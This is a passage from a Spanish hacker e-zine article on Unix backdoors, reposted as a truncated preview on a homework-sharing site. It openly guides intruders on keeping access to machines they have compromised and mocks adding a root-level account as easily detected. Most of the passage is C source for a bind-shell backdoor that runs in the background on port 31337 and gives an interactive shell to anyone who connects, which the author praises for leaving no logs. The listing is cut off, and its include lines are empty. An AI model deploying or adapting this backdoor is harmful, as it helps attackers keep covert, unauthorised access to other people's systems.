Backdoors

Páginas: 13 (3194 palabras) Publicado: 22 de septiembre de 2012
BackDoors

Autor: Fuego Fatuo (La KaTeDral)
 
Este texto es una adaptacion/traduccion del articulo 'BackDoors Revised'
publicado en la Confidence Remains High n.3 escrito por Blk-Majik (Menuo nick
XDDDD ). He añadido algunas backdoors, he modificao otras y he kitao otras.
Osea, ke este texto tambien tiene algo mio.
 
Utiliza este texto de manera responsable: Osea, ke te sirva pa aseguraralgun
hack :)
 
Introducion:
 
COMO? , si esperas ke me enrolle a escribir, la llevas clara .... No me
gusta escribir, asiske ...., si tienes 'alguna' duda me escribes, si no
entiendes casi na, olvidalo tio.... (Ke RADIKAL XDDDD)
 
 
Ke es una backdoor?
 
Puessss,....., es una 'Puerta trasera' ke sirve pa volver a entrar a una
makina hackeada en caso de ke te kiten el accesonormal, tb se le llama asi
a lo ke dejas en una makina para asegurarte el root.
 
Una cosa debe estar clara, a~adir un usuario con :0:0: es de lamers, ya
ke se detecta como na!,y no solo por el root, tb por otro hacker (yo he
encontrao :0:0: SIN PASSWORD!!! Algun lamer .. ).
 
He de reconocer ke yo tengo una cta asi (pero kon pass), pero porke nadie
aparece por esa makina desde hacea~os, osea ke no me preocupa.
 
 
Ke necesito pa poner una backdoor?
 
Una makina donde ponerla (osea login y pass), de momento, con esto solo te
basta pa poner alguna backdoor, tb es verdad ke kon eso ... poco mas ke
komerte los mocos.
 
 
Nene!!, trabaja un poco y conviertete en root.
 
*Por cierto, por si no te habias dao cuenta, me refiero a backdoors para
sistemas basados enUNIX.
 
Bien, veamos esas backdoors:
 
1- Pa poner esta backdoor, con solo ser un simple usuario basta, consiste
en un simple programita en C, ke al ejecutarlo se keda ejecutando en segundo
plano residente, este programita es un servidor, e.d. atiende un puerto,
cuando alguien se conesta a ese puerto,el servidor atiende a ese 'alguien',
ejecuta una shell y deja ke ese alguien interactue(los gurus de linux me
mataran al ver komo explico esto) con esa shell, osea, komo si estuviera
dentro, eso si, sin dejar logs (esto es bueno),una cosa ke no debeis olvidar,
es poner al final de cada linea un ';' (no voy a explicar porque).
 
Pa ke lo entiendas:
cat /etc/passwd -pasa a ser- cat /etc/passwd;
 
Se ejecuta el comando y depues dara un error,pasa de el, komo yo paso de
vosotros ..... ( Y MAS, Y MAS, Y MAS RADIKAL XDDDDD. ME RULO!!!!)
 
Evidentemente, esta backdoor no es muy recomendable ya ke se ve con un
simple 'ps', ademas, cuando el servidor ejecuta la shell lo hace como akel ke
ha ejecutao el programa, osea ke si pones esta backdoor sin ser root, solo
te aseguras el acceso como usuario, bueno ... algo es algo.
 
Elprograma en cuestion:
 
set_017/backdoors/back1.c
/* quick thingy... bind a shell to a socket... defaults to port 31337 */
/* code by pluvius@io.org */
/* don't forget.. when you connect to the port.. commands are like: */
/* "ls -l;" or "exit;" (don't forget the ';') */
#define PORT 31337
#include
#include#include
#include
#include
 
int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
 
struct sockaddr_in serv_addr; struct sockaddr_in client_addr;
 
int main ()
{
 
soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
 
if (soc_des == -1) exit(-1);
 
bzero((char *) &serv_addr, sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);serv_addr.sin_port = htons(PORT);
 
soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
if (soc_rc != 0) exit(-1);
 
if (fork() != 0) exit(0);
 
setpgrp();
signal(SIGHUP, SIG_IGN);
if (fork() != 0) exit(0);
 
soc_rc = listen(soc_des, 5);
if (soc_rc != 0) exit(0);
while (1)
{
soc_len = sizeof(client_addr);
soc_cli = accept(soc_des, (struct...
Leer documento completo

Regístrate para leer el documento completo.

Conviértase en miembro formal de Buenas Tareas

INSCRÍBETE - ES GRATIS